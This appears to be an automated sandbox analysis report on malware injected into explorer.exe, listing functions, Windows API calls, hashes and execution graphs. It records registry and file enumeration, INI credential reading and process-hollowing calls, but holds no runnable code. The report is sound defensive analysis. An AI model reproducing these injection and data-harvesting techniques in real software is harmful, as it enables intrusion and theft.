                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                                      • API String ID: 0-384346570
                                                                                                                                      • Opcode ID: c89b955154fe0ca12eff76692b98bafbd90ad57779b8d0a695fa8b395e0b92eb
                                                                                                                                      • Instruction ID: e41f1859abc6165581f56af42f31dcaee066d59730ffcde1d6d1a1e56909537c
                                                                                                                                      • Opcode Fuzzy Hash: c89b955154fe0ca12eff76692b98bafbd90ad57779b8d0a695fa8b395e0b92eb
                                                                                                                                      • Instruction Fuzzy Hash: 44D119706083009FD758DB298882A6EBBE9FF88754F10492EF945CB291DB74D985CB93
                                                                                                                                      Function 007E96BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 007E96E7
                                                                                                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 007E9707
                                                                                                                                      • _alldiv.NTDLL(00000000,80000000,?,?), ref: 007E9739
                                                                                                                                      • _alldiv.NTDLL(00000001,80000000,?,?), ref: 007E976C
                                                                                                                                      • _allmul.NTDLL(?,?,?,?), ref: 007E9798
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _alldiv$_allmul
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4215241517-0
                                                                                                                                      • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                      • Instruction ID: a6dd0394438763ae11944f9ac0d0606748056be61fec4de98c03d8e355ab5454
                                                                                                                                      • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                                      • Instruction Fuzzy Hash: 8221017312B6D5AAD7345D2B4CC4B6B3688DBDC790F25012EEB01C2242F95E889880A2
                                                                                                                                      Function 007FB162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _allmul.NTDLL(?,00000000,00000000), ref: 007FB1B3
                                                                                                                                      • _alldvrm.NTDLL(?,?,00000000), ref: 007FB20F
                                                                                                                                      • _allrem.NTDLL(?,00000000,?,?), ref: 007FB28A
                                                                                                                                      • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 007FB298
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1484705121-0
                                                                                                                                      • Opcode ID: d84d7f3ede48b5f0c1c824066d57c7847823bf4665173fcdcb1a855c30b471e8
                                                                                                                                      • Instruction ID: d35b63ab368974f9d5b4373d36fae0986002d0a910abcb1cb7d552475d38f2f7
                                                                                                                                      • Opcode Fuzzy Hash: d84d7f3ede48b5f0c1c824066d57c7847823bf4665173fcdcb1a855c30b471e8
                                                                                                                                      • Instruction Fuzzy Hash: E94127B56083499BC718EF29C89592EB7E5BFC8310F04492DFA9597362DB34EC05CB92
                                                                                                                                      Function 007E1953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                      • lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                      • lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                      • lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                      • Opcode ID: 5dcba390e3e41512d09cd0a1d53112c87b8569db19386811aa7dbf6c49b79cfb
                                                                                                                                      • Instruction ID: 0f79f317ee26a3c6628b1d09615c6225fbc18978e5c2116552b205bb5f7f6e40
                                                                                                                                      • Opcode Fuzzy Hash: 5dcba390e3e41512d09cd0a1d53112c87b8569db19386811aa7dbf6c49b79cfb
                                                                                                                                      • Instruction Fuzzy Hash: 5AE0EDA230025C2B472473AF9CA4D7B7BDCDAC96A43090039FA08E3302F96AAC0446B0
                                                                                                                                      Function 0080F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E6A81: memset.NTDLL ref: 007E6A9C
                                                                                                                                      • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0080F2A1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _aulldivmemset
                                                                                                                                      • String ID: %llu$%llu
                                                                                                                                      • API String ID: 714058258-4283164361
                                                                                                                                      • Opcode ID: 03da3c45d8375d689fb54d6ecb9105dbcab2aaa0cdb8c365f7b3f48856d8b400
                                                                                                                                      • Instruction ID: b686df8e92a0172bef15b512b74b4bbf13b2f96c2625998c27f771776944c719
                                                                                                                                      • Opcode Fuzzy Hash: 03da3c45d8375d689fb54d6ecb9105dbcab2aaa0cdb8c365f7b3f48856d8b400
                                                                                                                                      • Instruction Fuzzy Hash: 6B21F6B2A44655ABC710AA24CC46F6B7758FF85730F048238FA25D76C2DB65EC11C7E2
                                                                                                                                      Function 007F203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _allmul.NTDLL(?,00000000,?), ref: 007F2174
                                                                                                                                      • _allmul.NTDLL(?,?,?,00000000), ref: 007F220E
                                                                                                                                      • _allmul.NTDLL(?,00000000,00000000,?), ref: 007F2241
                                                                                                                                      • _allmul.NTDLL(007E2E26,00000000,?,?), ref: 007F2295
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _allmul
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4029198491-0
                                                                                                                                      • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                      • Instruction ID: 3f894bd3070a0df5f00747a300336962f112815f00cb455841fcdaadf71f4d80
                                                                                                                                      • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                                      • Instruction Fuzzy Hash: B8A17AB07087099BC714EE69C881A3EB7E6BFD8704F40482CF65587352EB78EC468B42
                                                                                                                                      Function 007F78B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: memcpymemset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                      • Opcode ID: 9e564ccca55cadbcdacd0cb8da6833c3161f8b69d56422100ac22a4c48d1573d
                                                                                                                                      • Instruction ID: 4f153643aacd9a1135710fad3892c4a400ad626963b6eca281d6ded76bc11160
                                                                                                                                      • Opcode Fuzzy Hash: 9e564ccca55cadbcdacd0cb8da6833c3161f8b69d56422100ac22a4c48d1573d
                                                                                                                                      • Instruction Fuzzy Hash: 9A818FB160C3589FC354DF29C884A2BBBE5FF88704F14496DF98587352D678E904CB92
                                                                                                                                      Function 007E190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlen.KERNEL32(?,?,?,?,00000000,007E2783), ref: 007E192B
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,007E2783), ref: 007E1930
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 007E1946
                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 007E194A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcatlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1475610065-0
                                                                                                                                      • Opcode ID: d4484e5a8eeb592be4722d14b9a021fcf58c1c7c817322a9b768ab42c0bbeeb8
                                                                                                                                      • Instruction ID: ea501f0c1c4889e75573466b7d39d11582aea53d749e5fdd467f846fcfdd7028
                                                                                                                                      • Opcode Fuzzy Hash: d4484e5a8eeb592be4722d14b9a021fcf58c1c7c817322a9b768ab42c0bbeeb8
                                                                                                                                      • Instruction Fuzzy Hash: 80E022A230029C2B072073BF6C94D3B77DCDAC92A530A0035FA04C3302FEAAAC0186F0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:20.5%
                                                                                                                                      Dynamic/Decrypted Code Coverage:86.8%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:182
                                                                                                                                      Total number of Limit Nodes:17
                                                                                                                                      execution_graph 1206 a3a1e0 1207 a3a1e6 1206->1207 1208 a3a298 3 API calls 1207->1208 1209 a3a248 1208->1209 1007 a337f4 1008 a33804 1007->1008 1015 a3372c 1008->1015 1011 a3387c 1013 a33817 1013->1011 1025 a336c8 1013->1025 1016 a3375a 1015->1016 1017 a33777 RegCreateKeyExW 1016->1017 1018 a337cd 1017->1018 1019 a337bc RegCloseKey 1017->1019 1033 a31860 1018->1033 1019->1018 1022 a322b4 1023 a322d6 1022->1023 1024 a322c8 CreateStreamOnHGlobal 1022->1024 1023->1013 1024->1023 1026 a3371e 1025->1026 1027 a336cd 1025->1027 1026->1011 1028 a33716 1027->1028 1037 a321e4 1027->1037 1030 a31860 RtlFreeHeap 1028->1030 1030->1026 1031 a33706 1032 a31860 RtlFreeHeap 1031->1032 1032->1028 1034 a3186e 1033->1034 1035 a31886 1034->1035 1036 a31878 RtlFreeHeap 1034->1036 1035->1011 1035->1022 1036->1035 1038 a3220b 1037->1038 1043 a31e20 1038->1043 1041 a31860 RtlFreeHeap 1042 a32297 1041->1042 1042->1031 1052 a31e6d 1043->1052 1044 a321b5 1045 a31860 RtlFreeHeap 1044->1045 1046 a321cb 1045->1046 1046->1041 1047 a3219b 1047->1044 1048 a31860 RtlFreeHeap 1047->1048 1048->1044 1049 a31860 RtlFreeHeap 1050 a3218e 1049->1050 1050->1047 1051 a31860 RtlFreeHeap 1050->1051 1051->1047 1052->1044 1052->1047 1053 a31860 RtlFreeHeap 1052->1053 1054 a32177 1052->1054 1053->1054 1054->1049 1215 a3a1f9 1216 a3a479 1215->1216 1217 a3a228 1215->1217 1218 a3a298 3 API calls 1217->1218 1219 a3a248 1218->1219 1055 a3a298 1060 a3a29d 1055->1060 1056 a3a385 LoadLibraryA 1056->1060 1058 a3a3e0 VirtualProtect VirtualProtect 1059 a3a46e 1058->1059 1059->1059 1060->1056 1060->1058 1061 a3a3d5 1060->1061 1074 a33608 1079 a33458 StrStrIW 1074->1079 1077 a33458 17 API calls 1078 a3365d 1077->1078 1080 a3350f 1079->1080 1081 a3348f 1079->1081 1083 a33523 RegOpenKeyExW 1080->1083 1104 a32774 1081->1104 1084 a335e4 1083->1084 1095 a3354d 1083->1095 1085 a31860 RtlFreeHeap 1084->1085 1088 a335f7 1085->1088 1086 a335b5 RegEnumKeyExW 1086->1084 1086->1095 1087 a334a8 1087->1080 1089 a33507 1087->1089 1117 a328a0 1087->1117 1088->1077 1090 a31860 RtlFreeHeap 1089->1090 1090->1080 1093 a32700 RtlFreeHeap 1093->1095 1094 a334fa 1096 a31860 RtlFreeHeap 1094->1096 1095->1086 1095->1093 1098 a33458 14 API calls 1095->1098 1100 a31860 RtlFreeHeap 1095->1100 1096->1089 1098->1095 1100->1095 1103 a31860 RtlFreeHeap 1103->1094 1105 a32793 1104->1105 1106 a32797 RegOpenKeyExW 1104->1106 1105->1106 1107 a327d5 RegQueryValueExW 1106->1107 1108 a3286b 1106->1108 1110 a3285b RegCloseKey 1107->1110 1112 a327fe 1107->1112 1109 a3288d 1108->1109 1111 a32774 RtlFreeHeap 1108->1111 1109->1087 1110->1108 1110->1109 1111->1109 1112->1110 1113 a3281a RegQueryValueExW 1112->1113 1114 a32851 1113->1114 1115 a32844 1113->1115 1116 a31860 RtlFreeHeap 1114->1116 1115->1110 1116->1115 1119 a328b9 1117->1119 1118 a32922 1118->1094 1123 a32700 1118->1123 1119->1118 1120 a31860 RtlFreeHeap 1119->1120 1122 a328df 1120->1122 1121 a32774 5 API calls 1121->1122 1122->1118 1122->1121 1124 a32712 1123->1124 1125 a31860 RtlFreeHeap 1124->1125 1126 a3271d 1125->1126 1126->1094 1127 a33254 1126->1127 1151 a3298c 1127->1151 1130 a3343a 1130->1103 1131 a3298c GetFileAttributesW 1134 a33295 1131->1134 1132 a3342c 1160 a330a8 1132->1160 1134->1130 1134->1132 1155 a32938 1134->1155 1137 a33304 GetPrivateProfileSectionNamesW 1138 a3340c 1137->1138 1149 a3331e 1137->1149 1139 a31860 RtlFreeHeap 1138->1139 1140 a33414 1139->1140 1141 a31860 RtlFreeHeap 1140->1141 1142 a3341c 1141->1142 1143 a31860 RtlFreeHeap 1142->1143 1145 a33424 1143->1145 1144 a3334e GetPrivateProfileStringW 1146 a33379 GetPrivateProfileIntW 1144->1146 1144->1149 1147 a31860 RtlFreeHeap 1145->1147 1146->1149 1147->1132 1148 a330a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1148->1149 1149->1138 1149->1144 1149->1148 1150 a31860 RtlFreeHeap 1149->1150 1150->1149 1152 a32999 1151->1152 1154 a329a9 1151->1154 1153 a3299e GetFileAttributesW 1152->1153 1152->1154 1153->1154 1154->1130 1154->1131 1156 a32945 1155->1156 1157 a32980 1155->1157 1156->1157 1158 a3294a CreateFileW 1156->1158 1157->1137 1157->1138 1158->1157 1159 a32972 CloseHandle 1158->1159 1159->1157 1161 a330cc 1160->1161 1162 a330f1 FindFirstFileW 1161->1162 1163 a33237 1162->1163 1172 a33117 1162->1172 1164 a31860 RtlFreeHeap 1163->1164 1165 a3323f 1164->1165 1166 a31860 RtlFreeHeap 1165->1166 1167 a33247 1166->1167 1167->1130 1168 a33210 FindNextFileW 1170 a33226 FindClose 1168->1170 1168->1172 1169 a32700 RtlFreeHeap 1169->1172 1170->1163 1171 a31860 RtlFreeHeap 1171->1168 1172->1168 1172->1169 1172->1171 1174 a330a8 RtlFreeHeap 1172->1174 1175 a31860 RtlFreeHeap 1172->1175 1176 a32f7c 1172->1176 1174->1172 1175->1172 1186 a32bc0 1176->1186 1179 a33086 1179->1172 1181 a3307e 1182 a31860 RtlFreeHeap 1181->1182 1182->1179 1183 a32e04 RtlFreeHeap 1184 a32fb6 1183->1184 1184->1179 1184->1181 1184->1183 1185 a31860 RtlFreeHeap 1184->1185 1185->1184 1187 a32bf3 1186->1187 1188 a32700 RtlFreeHeap 1187->1188 1189 a32c54 1188->1189 1190 a32a54 RtlFreeHeap 1189->1190 1191 a32c68 1190->1191 1192 a32c7e 1191->1192 1193 a31860 RtlFreeHeap 1191->1193 1194 a31860 RtlFreeHeap 1192->1194 1193->1192 1199 a32cb2 1194->1199 1195 a31860 RtlFreeHeap 1196 a32dd9 1195->1196 1197 a31860 RtlFreeHeap 1196->1197 1198 a32de1 1197->1198 1198->1179 1202 a32a54 1198->1202 1200 a32da3 1199->1200 1201 a31860 RtlFreeHeap 1199->1201 1200->1195 1201->1200 1204 a32a86 1202->1204 1203 a32ad9 1203->1184 1204->1203 1205 a31860 RtlFreeHeap 1204->1205 1205->1203 1210 a33668 1211 a33458 17 API calls 1210->1211 1212 a3369b 1211->1212 1213 a33458 17 API calls 1212->1213 1214 a336bd 1213->1214 1062 a3a1af 1063 a3a1bd 1062->1063 1064 a3a1cf 1063->1064 1067 a3a298 1063->1067 1072 a3a29d 1067->1072 1068 a3a385 LoadLibraryA 1068->1072 1070 a3a3e0 VirtualProtect VirtualProtect 1071 a3a46e 1070->1071 1071->1071 1072->1068 1072->1070 1073 a3a248 1072->1073

                                                                                                                                      Callgraph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Opacity -> Relevance
                                                                                                                                      • Disassembly available
                                                                                                                                      callgraph 0 Function_00A328A0 58 Function_00A31838 0->58 80 Function_00A31860 0->80 91 Function_00A32774 0->91 1 Function_00A323A0 2 Function_00A347A7 3 Function_00A399A7 4 Function_00A330A8 4->4 16 Function_00A32688 4->16 37 Function_00A32AF8 4->37 54 Function_00A3272C 4->54 62 Function_00A32700 4->62 4->80 93 Function_00A32F7C 4->93 5 Function_00A3A1AF 22 Function_00A3A298 5->22 6 Function_00A322AC 7 Function_00A323AC 8 Function_00A340AC 9 Function_00A314B2 10 Function_00A338B0 10->10 46 Function_00A31AD4 10->46 10->58 11 Function_00A322B4 12 Function_00A39EB4 13 Function_00A340BC 14 Function_00A31980 15 Function_00A34084 16->58 17 Function_00A3298C 18 Function_00A31B8C 18->58 19 Function_00A3188C 19->58 20 Function_00A39C92 21 Function_00A32498 21->7 96 Function_00A32340 21->96 105 Function_00A3A25A 22->105 23 Function_00A3409C 24 Function_00A31DE0 99 Function_00A31A4C 24->99 25 Function_00A3A1E0 25->22 26 Function_00A321E4 50 Function_00A31E20 26->50 26->58 26->80 27 Function_00A340E4 28 Function_00A318E8 29 Function_00A322E8 30 Function_00A340F2 31 Function_00A323F0 31->7 32 Function_00A337F4 32->6 32->11 32->29 44 Function_00A336C8 32->44 53 Function_00A3372C 32->53 67 Function_00A32308 32->67 87 Function_00A32B6C 32->87 89 Function_00A32570 32->89 102 Function_00A32354 32->102 33 Function_00A340F4 34 Function_00A314F9 35 Function_00A3A1F9 35->22 36 Function_00A318F8 37->58 38 Function_00A32EF8 73 Function_00A32610 38->73 39 Function_00A340FC 40 Function_00A39FC2 41 Function_00A329C0 41->16 42 Function_00A32BC0 42->16 42->54 42->58 59 Function_00A31938 42->59 42->62 42->73 42->80 104 Function_00A32A54 42->104 43 Function_00A340C4 44->26 44->28 74 Function_00A31B14 44->74 44->80 45 Function_00A318D0 47 Function_00A314D4 48 Function_00A39ADA 49 Function_00A31822 50->14 50->19 50->24 50->36 50->45 50->58 71 Function_00A31D10 50->71 50->80 95 Function_00A31C40 50->95 51 Function_00A34124 52 Function_00A3B124 53->58 53->80 55 Function_00A3B12C 56 Function_00A39930 57 Function_00A32938 60 Function_00A34001 61 Function_00A31000 62->16 62->80 63 Function_00A31405 64 Function_00A32E04 64->18 64->58 64->80 65 Function_00A34104 66 Function_00A31508 68 Function_00A33608 106 Function_00A33458 68->106 69 Function_00A3B00C 70 Function_00A39912 71->36 71->58 72 Function_00A32410 72->7 72->31 73->58 74->58 75 Function_00A32514 75->1 75->31 82 Function_00A32360 75->82 98 Function_00A3234C 75->98 75->102 76 Function_00A34214 77 Function_00A3141D 78 Function_00A3411C 79 Function_00A3971C 80->46 81 Function_00A31560 83 Function_00A34064 84 Function_00A3416A 85 Function_00A33668 85->106 86 Function_00A3156C 87->21 87->75 88 Function_00A3406C 89->1 89->58 89->102 90 Function_00A31576 91->58 91->80 91->91 92 Function_00A3B074 93->38 93->42 93->64 93->80 93->104 94 Function_00A3407C 97 Function_00A34144 100 Function_00A3A055 101 Function_00A33254 101->4 101->16 101->17 101->54 101->57 101->58 101->80 103 Function_00A31254 104->58 104->80 106->0 106->16 106->41 106->58 106->62 106->80 106->91 106->101 106->106

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00A330A8 Relevance: 4.7, APIs: 3, Instructions: 153fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 184 a330a8-a330e3 call a32688 call a3272c 189 a330e5-a330e6 184->189 190 a330ec-a33111 call a32688 FindFirstFileW 184->190 189->190 193 a33237-a33252 call a31860 * 2 190->193 194 a33117-a33118 190->194 196 a3311f-a33124 194->196 198 a3312a-a3313e 196->198 199 a331ad-a331df call a32688 call a32700 196->199 205 a33210-a33220 FindNextFileW 198->205 206 a33144-a33158 198->206 214 a331e1-a331eb call a32af8 199->214 215 a33208-a3320b call a31860 199->215 205->196 208 a33226-a33230 FindClose 205->208 206->205 211 a3315e-a3316b call a3272c 206->211 208->193 219 a33176 211->219 220 a3316d-a33174 211->220 214->215 223 a331ed-a33203 call a32f7c 214->223 215->205 222 a33178-a331a8 call a32688 call a32700 call a330a8 call a31860 219->222 220->222 222->199 223->215
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                      • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                      • Instruction ID: b637c322c0f29dcf1c66838bd3bf8c3c583857a13df2699fca97f2409c636856
                                                                                                                                      • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                                                      • Instruction Fuzzy Hash: 76417C31718B4C4FDF94EB3899997AA73E2FBD8341F444A29B44AC3291EF78D9048781
                                                                                                                                      Function 00A338B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 239 a338b0-a33907 call a31ad4 call a31838 NtUnmapViewOfSection call a3388c 248 a33911-a3391a 239->248 249 a33909-a3390c call a338b0 239->249 249->248
                                                                                                                                      APIs
                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 00A338F2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                      • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                      • Instruction ID: dee7b2687b6a88867a3a2ebb8588bb82c1bb39259e395311f38142e973467164
                                                                                                                                      • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                                                      • Instruction Fuzzy Hash: E9F0E520F19A080BEF6C77BD695D33822C0EB58311F500929B515C72D2DC3D8E458301
                                                                                                                                      Function 00A32774 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExW.KERNELBASE ref: 00A327C7
                                                                                                                                      • RegQueryValueExW.KERNELBASE ref: 00A327F4
                                                                                                                                      • RegQueryValueExW.KERNELBASE ref: 00A3283A
                                                                                                                                      • RegCloseKey.KERNELBASE ref: 00A32860
                                                                                                                                        • Part of subcall function 00A31860: RtlFreeHeap.NTDLL ref: 00A31880
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1641618270-0
                                                                                                                                      • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                      • Instruction ID: bd8affd4b7c7af9d1921d9c653868cca57a3d63f55d18cc3b7e60bfe4323775e
                                                                                                                                      • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                                                      • Instruction Fuzzy Hash: 1631853060CB488FE769DF28D45877A7BE0FBA8355F54062EF49AC2265DF34C9468742
                                                                                                                                      Function 00A3372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 22 a3372c-a337ba call a31838 RegCreateKeyExW 26 a337d6-a337f0 call a31860 22->26 27 a337bc-a337cb RegCloseKey 22->27 27->26 28 a337cd-a337d3 27->28 28->26
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000008.00000002.2346984734.0000000000A31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A31000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_8_2_a31000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreate
                                                                                                                                      • String ID: ?
                                                                                                                                      • API String ID: 2932200918-1684325040
                                                                                                                                      • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                      • Instruction ID: f67c5445fcc41d395a2a20e81ea845615941d7c52ca5c8851538c3687672b133
                                                                                                                                      • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                                                      • Instruction Fuzzy Hash: D7116370618B488FD751DF69D48866AB7E1FB98345F50062EF48AC3260DF389985CB82
                                                                                                                                      Function 00A3A298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
